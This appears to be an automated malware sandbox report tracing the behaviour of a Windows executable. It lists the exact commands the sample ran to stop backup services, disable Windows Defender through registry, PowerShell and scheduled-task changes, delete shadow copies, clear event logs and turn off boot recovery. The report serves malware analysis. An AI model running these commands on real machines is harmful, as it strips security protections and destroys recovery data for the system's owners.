to memory of 1920 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe PID 2060 wrote to memory of 1920 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe PID 2060 wrote to memory of 988 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe PID 2060 wrote to memory of 988 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe PID 2060 wrote to memory of 2392 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe PID 2060 wrote to memory of 2392 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe PID 2060 wrote to memory of 4056 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe PID 2060 wrote to memory of 4056 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe PID 2060 wrote to memory of 3192 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe PID 2060 wrote to memory of 3192 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1192
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1480
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:4044
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3416
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2448
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2380
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:3244
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12a5d" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12a5d" /y3⤵PID:3156
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:4092
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:736
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:592
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1100
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:944
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2572
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1240
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2320
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12a5d" start= disabled2⤵PID:1712
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1920
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:988
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2392
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:4056
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3192
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2260
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:320
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2952
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3080
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3880
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1344
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1448
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1188
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:820
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:68
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:504
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:4080
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3764
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2536
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2816
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2560
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:404
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:3852
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1200
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3776 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3632 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2440 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2340
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1648
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1932
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3180
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2876 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3796
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1668 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:488 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1552 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:872 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1184
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1800 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:8
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3464 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y1⤵PID:3580
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
MD5
4d65dd086c3931a681bf45bae39b36f8
SHA17776ec7306249b8a555f880b350173106a26598e
SHA2567c6b01d70f064deb736da06cf36f4793f693fbe266c1a17da6821f65677b7b6c
SHA5120cc037ddc88e4fac059ae56114e4d4d6ba4dc92e7609576e754af198d814caed7bfc54977aab2cf97f102e1decf2a4d8c668bbfd09123773c19da2d60667a692